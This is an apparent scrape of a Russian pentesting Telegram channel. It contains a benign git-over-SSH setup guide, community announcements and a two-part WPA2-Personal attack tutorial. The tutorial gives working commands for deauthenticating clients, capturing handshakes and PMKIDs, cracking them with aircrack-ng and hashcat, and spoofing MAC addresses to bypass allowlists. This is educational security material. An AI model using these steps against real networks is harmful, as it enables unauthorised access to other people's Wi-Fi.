Недавно мне понадобилось быстро развернуть git-сервер, но разворачивать что-то крупное было лень, поэтому покажу затерянный временем способ создания удаленного git-репозитория без использования gitlab, Gogs или Gitea.
Git использует 2 протокола передачи данных — HTTP и SSH. Для людей, которые только начали знакомится с git, использование первого протокола проблем не вызывает, а вот со вторым начинаются затупы на этапе настройки доступа через открытые ключи.
На самом деле SSH в git работает буквально так, как мы привыкли его использовать — подключается с именем пользователя git по публичному ключу и открывает оболочку, но не bash или zsh, а git-shell. Она ограничивает лишний доступ к системе и работает только с файлами репозитория. При этом директории с именами репозиториев должны иметь формат
<имя_репы>.git . Далее показан пример настройки доступа через ssh.apt update && apt install -y git
# Создание пользователя git
useradd -m git -s /usr/bin/git-shell
# Включение авторизации по публичным ключам
sed -i 's/^#*PubkeyAuthentication.*/PubkeyAuthentication yes/' /etc/ssh/sshd_config
sudo systemctl restart sshd
# Создание .ssh директории и файла authorized_keys
mkdir -p /home/git/.ssh
touch /home/git/.ssh/authorized_keys
chmod 700 /home/git/.ssh
chmod 600 /home/git/.ssh/authorized_keys
chown -R git:git /home/git/.ssh
echo 'ssh-ed25519 <ПУБЛИЧНЫЙ_КЛЮЧ_С_ДРУГОГО_УСТРОЙСТВА>' >> /home/git/.ssh/authorized_keys
# Создание репозитория
REPO_NAME="repo"
su -s /bin/bash git -c "mkdir -p ~/$REPO_NAME.git && cd ~/$REPO_NAME.git && git init --bare"
Всё это будет нормально работать на любой виртуалке с минимальной конфигурацией. Теперь можно пушить свою ветку на удаленный репозиторий:
REPO_NAME="repo"
git remote add origin "ssh://git@<HOST>:$REPO_NAME.git"
git push remote master
#ToolTricks
Please open Telegram to view this post
VIEW IN TELEGRAM
Привет, друзья! 👋
На связи команда канала Redtalk, и у нас отличные новости! В нашем ламповом кибер-мирке уже 900 хацкеров! 🔥 А это значит, что пора сделать анонс нашего мерча!❤️
Как только нас станет 1000, мы устроим розыгрыш среди подписчиков!
Спасибо каждому, кто с нами! Вы делаете наш канал живым и по-настоящему крутым😎
#Redtalk
На связи команда канала Redtalk, и у нас отличные новости! В нашем ламповом кибер-мирке уже 900 хацкеров! 🔥 А это значит, что пора сделать анонс нашего мерча!
Как только нас станет 1000, мы устроим розыгрыш среди подписчиков!
Спасибо каждому, кто с нами! Вы делаете наш канал живым и по-настоящему крутым
#Redtalk
Please open Telegram to view this post
VIEW IN TELEGRAM
Привет! 👀
Мы сами очень хотели попасть на Offzone, но в этот раз не сложилось
Зато есть классный постик от наших друзей!👍
Мы сами очень хотели попасть на Offzone, но в этот раз не сложилось
Зато есть классный постик от наших друзей!
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedBlue Notes
RedBlue Notes на OFFZONE 2025!!
Хоть сегодня только первый день конференции, но я уже получил море положительных эмоций. Послушал доклад легендарного Евгения, спаял себе новый аддон и ещё 1 получил за квест, пополнил свою ИБ библиотеку ресёчем.
В моей коллекции +-10 аддонов, что по меркам конфы много. Но я встретил того, кто собрал ЁЛЕУ из кучи аддонов. Просто вау🔝
Хоть сегодня только первый день конференции, но я уже получил море положительных эмоций. Послушал доклад легендарного Евгения, спаял себе новый аддон и ещё 1 получил за квест, пополнил свою ИБ библиотеку ресёчем.
В моей коллекции +-10 аддонов, что по меркам конфы много. Но я встретил того, кто собрал ЁЛЕУ из кучи аддонов. Просто вау
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
notachisel.gif
4.7 MB
А я провел еще один небольшой анализ сигнатур антивирусов. На этот раз — Chisel. Уж очень нужен был для редтима инструмент проброса защищенного ресерс-прокси. Материала получилось меньше по сравнению с предыдущим ресерчем, но всё еще достаточно для Markdown :)
Приятного чтения!
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Друзья, привет🤗!!!
А у нас завтра намечается стрим с нашими друзьями из СБ Про Бизнес 🤩!
Начинающим специалистам и ребятам из смежных сфер и бизнеса будет особенно полезно
А у нас завтра намечается стрим с нашими друзьями из СБ Про Бизнес 🤩!
Начинающим специалистам и ребятам из смежных сфер и бизнеса будет особенно полезно
Forwarded from СБ Про Бизнес | Безопасность
Разговор с "ХАКЕРОМ"!
Что такое "взлом системы"? Да это же по сути - ПЕНТЕСТ!!!
Парням "по ту сторону закона" легко, их ничто не ограничивает... А на этой стороне закона, куча ограничений в работе, поэтому опыт от работы, значительно серьезней. Если это твоя работа, и каждый день ты занимаешься только этим... Волей не волей, превратишься в супер специалиста☝️
И мы решили провести СТРИМ!!!
У нас в гостях ПЕНТЕСТЕР со стажем!!! Создатель ТГ Канала https://t.me/REDTalk_base
♦️Александр Негода♦️@closed_character
и мы будем с ним разговаривать про взломы систем, хакинг, пентест и многое другое!!!
Поскольку общение будет online готовьте вопросики😉
Стрим будет по ссылке:
https://telemost.yandex.ru/j/77693374624664
Когда: 4 сентября в 20.30
И приходите вовремя...
Версия яндекстелемост бесплатная, поэтому ТОЛЬКО 50 Человек, сможет попасть на стрим🤷♂️ остальные в этот раз "мимо"...
Полезно будет для БИЗНЕСА☝️ А то, до сих пор считают, что хакер это парень в капюшоне 🤦♂️ А это уже давно серьезный бизнес!!!
P.S.Мы подготовили небольшой сувенир, сделанный "собственными руками", за лучший вопрос! Выберем победителя и подарим ему😉
Фото сувенира будет опубликовано завтра в канале))
Что такое "взлом системы"? Да это же по сути - ПЕНТЕСТ!!!
Парням "по ту сторону закона" легко, их ничто не ограничивает... А на этой стороне закона, куча ограничений в работе, поэтому опыт от работы, значительно серьезней. Если это твоя работа, и каждый день ты занимаешься только этим... Волей не волей, превратишься в супер специалиста☝️
И мы решили провести СТРИМ!!!
У нас в гостях ПЕНТЕСТЕР со стажем!!! Создатель ТГ Канала https://t.me/REDTalk_base
♦️Александр Негода♦️@closed_character
и мы будем с ним разговаривать про взломы систем, хакинг, пентест и многое другое!!!
Поскольку общение будет online готовьте вопросики😉
Стрим будет по ссылке:
https://telemost.yandex.ru/j/77693374624664
Когда: 4 сентября в 20.30
И приходите вовремя...
Версия яндекстелемост бесплатная, поэтому ТОЛЬКО 50 Человек, сможет попасть на стрим🤷♂️ остальные в этот раз "мимо"...
Полезно будет для БИЗНЕСА☝️ А то, до сих пор считают, что хакер это парень в капюшоне 🤦♂️ А это уже давно серьезный бизнес!!!
P.S.
Фото сувенира будет опубликовано завтра в канале))
Привет, друзья! 🖥
Хотим рассказать про наших коллег и друзей из компании Актив —🔗 aktiv.consulting. Они специализируются на широком спектре услуг в мире ИБ — это аудиты, пентесты, построение ИБ-процессов, бумажная безопасность и проверка требований регуляторов.
Недавно у них вышел🔗 пост про виды железок, используемых в процессе тестирования на проникновение физического периметра организаций.
Рекомендуем к просмотру!👍
Хотим рассказать про наших коллег и друзей из компании Актив —
Недавно у них вышел
Рекомендуем к просмотру!
Please open Telegram to view this post
VIEW IN TELEGRAM
Привет, друзья! 👋
Все эти ваши пентесты давно уже не просто "галочка” в документиках, а реальный способ понять, насколько ваша компания уязвима перед методами, которыми пользуются реальные злоумышленники.
Игнорировать это всё равно, что играть в рулетку с собственной репутацией, данными клиентов и бизнесом в целом.
Недавно мы подробно обсудили эту тему на стриме с ребятами с канала СБПроБизнес.
Выбирайте любимую площадку. И приятного просмотра:
📺 YouTube
📺 Rutube
📝 Дзен
📺 ВК
Все эти ваши пентесты давно уже не просто "галочка” в документиках, а реальный способ понять, насколько ваша компания уязвима перед методами, которыми пользуются реальные злоумышленники.
Игнорировать это всё равно, что играть в рулетку с собственной репутацией, данными клиентов и бизнесом в целом.
Недавно мы подробно обсудили эту тему на стриме с ребятами с канала СБПроБизнес.
Выбирайте любимую площадку. И приятного просмотра:
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Разговор с "хакером"
Полезный стрим с ♦️Александр Негода♦️@closed_character! Почему многие коллеги из СБ и Бизнеса считают хакеров "одиночкой в капюшоне"? Почему нет понимания, что "хакер" это уже давно серьезный и дорогой бизнес? Стереотипное отношение к проблеме, порождает…
Всем привет! 👋 Сегодня немного поговорим о том, как пентестить Wi-Fi сети, а именно WPA2 Personal. Берите чашечку кофе и присаживайтесь.☕️
WPA2 Personal🐈⬛
Самый популярный протокол, используемый в персональных сетях Wi-Fi на данный момент, — это WPA2. Новая версия, WPA3, постепенно отвоёвывает себе место под солнцем👊 , но всё ещё встречается гораздо реже. Более старые протоколы WEP и WPA практически не используются.
🔘 Первым типом атаки на WPA2, который рассмотрим, является перехват handshake, во время которого клиент и точка доступа обмениваются ключами.🔑
Для данной атаки будем использовать утилиты семейства aircrack-ng (также можно использовать утилиту airgeddon для удобства).
🔹 Для начала необходимо включить режим мониторинга сети у интерфейса:
Иногда может выскакивать сообщенияу с просьбой “убить” процессы, которые могут помещать перевести наш интерфейс в режим мониторинга.
Для этого достаточно ввести команду
🔹 Следующим шагом будем поиск доступных сетей Wi-Fi и клиентов. Сделать это можно будет с помощью утилиты airodump-ng. Флаг -w позволит сохранит результаты сканирования.
🔹 Иногда полезно посмотреть карту точек доступа и подключенных к ним клиентов, чтобы понять на какую точку доступа нам нацелиться. Сделать это можно с помощью утилиты airgraph-ng. В параметрах передаем тип изображения, который хотим сохранить, а также файл с результатами сканирования:
После определения нашей цели мы можем подождать пока кто-то подключиться к точке доступа или же начать деаутентификацию клиентов уже подключенных к точке.
🔹 Для начала настроим airodump на захват пакетов с определенной точки доступа и канала:
🔹 Деаутентификацию клиентов выполним с помощью утилиты aireplay-ng:
Это заставит клиента переподключиться к точке доступа, что позволит нам перехватить handshake.📞
После захвата handshake airodump-ng выведет соответствующее сообщение:
🔹 Однако не стоит сразу сломя голову начать брутить handshake. Очень часто утилита airodump захватывает не все нужные нам пакеты (а их 4). Поэтому стоит взглянуть на захваченный файл и проверить, а все ли дома. Сделать это можно в ручную с помощью Wireshark или с помощью утилит cowpatty.
Данное сообщение означает, что все в порядке и можем смело брутить наш файл.
🔹 Для брутфорсе захваченного handshake подойдет cowpatty или aircrack-ng.
WPA2 Personal
Самый популярный протокол, используемый в персональных сетях Wi-Fi на данный момент, — это WPA2. Новая версия, WPA3, постепенно отвоёвывает себе место под солнцем
🔘 Первым типом атаки на WPA2, который рассмотрим, является перехват handshake, во время которого клиент и точка доступа обмениваются ключами.
Для данной атаки будем использовать утилиты семейства aircrack-ng (также можно использовать утилиту airgeddon для удобства).
🔹 Для начала необходимо включить режим мониторинга сети у интерфейса:
sudo airmon-ng start wlan0
Иногда может выскакивать сообщенияу с просьбой “убить” процессы, которые могут помещать перевести наш интерфейс в режим мониторинга.
Для этого достаточно ввести команду
airmon-ng check kill.🔹 Следующим шагом будем поиск доступных сетей Wi-Fi и клиентов. Сделать это можно будет с помощью утилиты airodump-ng. Флаг -w позволит сохранит результаты сканирования.
sudo airodump-ng wlan0mon -c 1 -w NETWORK
🔹 Иногда полезно посмотреть карту точек доступа и подключенных к ним клиентов, чтобы понять на какую точку доступа нам нацелиться. Сделать это можно с помощью утилиты airgraph-ng. В параметрах передаем тип изображения, который хотим сохранить, а также файл с результатами сканирования:
sudo airgraph-ng -i NETWORK.csv -g CAPR -o NETWORK.png
После определения нашей цели мы можем подождать пока кто-то подключиться к точке доступа или же начать деаутентификацию клиентов уже подключенных к точке.
🔹 Для начала настроим airodump на захват пакетов с определенной точки доступа и канала:
sudo airodump-ng -c 11 wlan0mon --essid wifinet -w NETWORK
🔹 Деаутентификацию клиентов выполним с помощью утилиты aireplay-ng:
sudo aireplay-ng -0 5 -a 60:3E:41:FE:30:83 -c 5C:12:B1:9B:ED:1A wlan0mon
Это заставит клиента переподключиться к точке доступа, что позволит нам перехватить handshake.
После захвата handshake airodump-ng выведет соответствующее сообщение:
kali@kali[/wifi]$ airodump-ng wlan0mon -c 1 -w NETWORK
06:11:03 Created capture file "NETWORK.cap".
🔹 Однако не стоит сразу сломя голову начать брутить handshake. Очень часто утилита airodump захватывает не все нужные нам пакеты (а их 4). Поэтому стоит взглянуть на захваченный файл и проверить, а все ли дома. Сделать это можно в ручную с помощью Wireshark или с помощью утилит cowpatty.
kali@kali[/wifi]$ cowpatty -c -r NETWORK
capcowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Данное сообщение означает, что все в порядке и можем смело брутить наш файл.
🔹 Для брутфорсе захваченного handshake подойдет cowpatty или aircrack-ng.
sudo aircrack-ng -w wordlist.txt -0 NETWORK.cap
Please open Telegram to view this post
VIEW IN TELEGRAM
<продолжение>
🔘 Следующий тип атаки на WPA2 Personal это захват PMKID.
PMKID (Pairwise Master Key Identifier) — это идентификатор, используемый в протоколе WPA/WPA2 для установления защищённого соединения между клиентом и точкой доступа Wi-Fi. Подробнее можете прочитать тут:
🔗🔗🔗
Для выполнения данной атаки можем использовать утилиту hxcdumptool.
🔹Для начала надо запустить сканирование сети и определить уязвимые точки для атаки PMKID. (прим. в примере показа не последняя версия hcxdumptool).
🔹 После определения уязвимой цели запускаем заново тулзу
В случае успеха мы получим следующее сообщение:
🔹После успешного захвата PMKID необходимо преобразовать pcap файл в hash.
🔹Для взлома хэша можем воспользоваться утилитой hashcat с флагом -m 22000
Также необходимо помнить, что для точки доступа может быть настроен белый список mac-адресов, что не позволит нам подключиться в случае даже успешного перебора пароля. К счастью для атакующих, обойти данный механизм защиты можно легко с помощью утилиты macchanger.
Для этого отключаем наш интерфейс и присваиваем ему mac-адрес клиента. (помните, что перед подключением к точке доступа нам необходимо деаутентифицировать клиента, чей mac-адрес мы себе присвоили, иначе мы не сможем подключиться.)
В следующей части посмотрим уже на атаки на WPA Enterpise сети. А пока подписывайтесь на канал и приятного чтения.👋
🔘 Следующий тип атаки на WPA2 Personal это захват PMKID.
PMKID (Pairwise Master Key Identifier) — это идентификатор, используемый в протоколе WPA/WPA2 для установления защищённого соединения между клиентом и точкой доступа Wi-Fi. Подробнее можете прочитать тут:
🔗🔗🔗
Для выполнения данной атаки можем использовать утилиту hxcdumptool.
🔹Для начала надо запустить сканирование сети и определить уязвимые точки для атаки PMKID. (прим. в примере показа не последняя версия hcxdumptool).
hcxdumptool -i wlan0mon --enable_status=3
🔹 После определения уязвимой цели запускаем заново тулзу
hcxdumptool -i wlan0mon --enable_status=3 --filterlist_ap=С1:33:E7:F5:65:91 --filtermode=2 -o PMKID.pcap
В случае успеха мы получим следующее сообщение:
initialization of hcxdumptool 6.2.5...
warning possible interfere: NetworkManager is running with pid 101
...
[SNIP]
05:15:18 2412/1 0e2e37d6886d d8d63deb29d5 [PMKID:p243frfa5erfe3vf64w1922ew321be35e6462
KDV:2]
...
🔹После успешного захвата PMKID необходимо преобразовать pcap файл в hash.
hcxpcapngtool -o hash PMKID.pcap
🔹Для взлома хэша можем воспользоваться утилитой hashcat с флагом -m 22000
hashcat -m 22000 --force hash wordlist.txt
Также необходимо помнить, что для точки доступа может быть настроен белый список mac-адресов, что не позволит нам подключиться в случае даже успешного перебора пароля. К счастью для атакующих, обойти данный механизм защиты можно легко с помощью утилиты macchanger.
Для этого отключаем наш интерфейс и присваиваем ему mac-адрес клиента. (помните, что перед подключением к точке доступа нам необходимо деаутентифицировать клиента, чей mac-адрес мы себе присвоили, иначе мы не сможем подключиться.)
sudo ifconfig wlan0 down
sudo macchanger wlan0 -m 3E:48:72:B7:62:2A
sudo ifconfig wlan0 up
В следующей части посмотрим уже на атаки на WPA Enterpise сети. А пока подписывайтесь на канал и приятного чтения.
Please open Telegram to view this post
VIEW IN TELEGRAM
Привет! 🤥
Недавно я перечитывал свои посты и наткнулся на один из самых старых — про переполнение стека. Вспомнил молодость, словил испанский стыд и решил сделать ремейк, а точнее, полностью переписать пост. Получилось небольшая статья про введение в эксплуатацию бинарных уязвимостей на простом примере задачи в формате ctf. Описаны базовые виды защиты памяти, пошагово создан CTF-таск с подробным решением.
Приятного чтения!🔗 Читать
Но это еще не всё! Cейчас в тренде импортозамещение, так, что я тоже решил не отставать и создал свой небольшой сайт:🔗 read.pyfffe.site. Туда переехали материалы из Notion, и теперь все гифки в постах нормально загружаются без впн (да, всё было ради гифок 👸 ). Да и в целом хорошо бы иметь полный контроль над своим ресурсом (просьба не пробовать его получать 👾).
Теперь всё, спасибо за внимание!
Недавно я перечитывал свои посты и наткнулся на один из самых старых — про переполнение стека. Вспомнил молодость, словил испанский стыд и решил сделать ремейк, а точнее, полностью переписать пост. Получилось небольшая статья про введение в эксплуатацию бинарных уязвимостей на простом примере задачи в формате ctf. Описаны базовые виды защиты памяти, пошагово создан CTF-таск с подробным решением.
Приятного чтения!
Но это еще не всё! Cейчас в тренде импортозамещение, так, что я тоже решил не отставать и создал свой небольшой сайт:
Теперь всё, спасибо за внимание!
Please open Telegram to view this post
VIEW IN TELEGRAM
pyfffe blog
Самый простой StackOverflaw
Привет, когда-то давно я писал свой первый таск на переполнение стека, и вот решил обернуть всё это в пост про введение в категорию pwn.
TL;DR
Исходники доступны ***на гитхабе.*** Таск поднимается несколькими командами, нужен лишь Docker. Решение также лежит…
TL;DR
Исходники доступны ***на гитхабе.*** Таск поднимается несколькими командами, нужен лишь Docker. Решение также лежит…
❤🔥10 3 2